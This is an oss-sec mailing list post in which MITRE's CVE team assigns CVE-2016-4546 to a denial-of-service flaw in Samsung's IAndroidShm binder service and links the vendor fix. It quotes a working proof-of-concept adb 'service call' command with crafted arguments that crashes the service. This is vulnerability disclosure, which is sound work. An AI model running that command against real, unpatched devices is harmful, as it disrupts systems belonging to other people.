oss-sec mailing list archives

Re: CVE request - samsumg android phone com.samsung.android.jam.IAndroidShm binder service DoS

From: cve-assign () mitre org
Date: Thu, 5 May 2016 22:39:11 -0400 (EDT)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

When a app send a evil data to com.samsung.android.jam.IAndroidShm
service by service command (Android system command) , can cause to
IAndroidShm service crash.

adb shell;

service call com.samsung.android.jam.IAndroidShm 5 i32 917154658 i32
998369275 i32 1652062893 i32 2113420870 i32 1380178743 i32 47342718
i32 543810222 i32 1481030271

Fix:
http://security.samsungmobile.com/smrupdate.html#SMR-JAN-2016
SVE-2015-5133: IAndroidShm IAPAService service DoS

A vulnerability without proper exception handling in system services
can lead to crash by calling malicious service commands.


Use CVE-2016-4546.

If you have additional reports about Samsung software, then
oss-security readers might find it useful if you include a reference
establishing that the software is open source. For example, we
selected an arbitrary Samsung repository of
git://opensource.samsung.com/SM-N900P and found a
vendor/samsung/common/external/jack/android/AndroidShm.cpp file
that may be related.

- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJXLANMAAoJEHb/MwWLVhi2150P/Rz+lyS2h7ZVm90d3Y1V2sSp
8M+zy6rN8YhjOizW2VhAWpf1U0ekDahXV9qDVmjOVxqiP5l3UXPVTb62Ee6zgYjd
fGPkYxQDMroqps42ryIg7K5eNsKGO0iZ+tsi8wfdH1wzk+opa6ta45CTqPHUl9vS
STi5sZoX2txMXCbfdcGsuudylkVG7y3FbjGw//cT7DcoHHQbWmSF7SmQwcdBzq/c
0Xl67OUOWBKFnNgrLdqifeS6Msa0YW52omLmSMOiLm9/+1jN5bCpfVrwWI78ALeG
FxfHi6HiVWZAyHPt894kCnNeynKa8uw2bWAEgy7RiHf42OBNp+15Crzdg2FvpBCa
8WXRgij1+ML7YtPbG0PfBt66rtlSpznlxp7jCeyriiKqsvSyKcS0rxVWNDbinn8g
vmApz6CqDAotB/PS4/dAv9EyvPlK/bSPiqmbYE0jDw2UmTKVrjc6DnlD0iSPgE4L
y4D6wmFLqSIljFadZVnnHqIGrdqJZQU14yWbw31Fjpp+NdKrMfG2VP/F7ZPPF1Qo
Dk+JYGurrooQwbDsEZ/6TTRXNEMfEtQRLHm7xCXzaxTFjwn12rA6jRlje0MoIPqQ
7Qtersx91679csj9cqAXlBbxgTwpFlIv5XqEcZRPiFKYK02NH/y2vyRE/2yCWkjW
pU6S7ZescwAX+GAeFsur
=GdhJ
-----END PGP SIGNATURE-----

Current thread:

CVE request - samsumg android phone com.samsung.android.jam.IAndroidShm binder service DoS Vinc3nt4H (May 05)
- Re: CVE request - samsumg android phone com.samsung.android.jam.IAndroidShm binder service DoS cve-assign (May 05)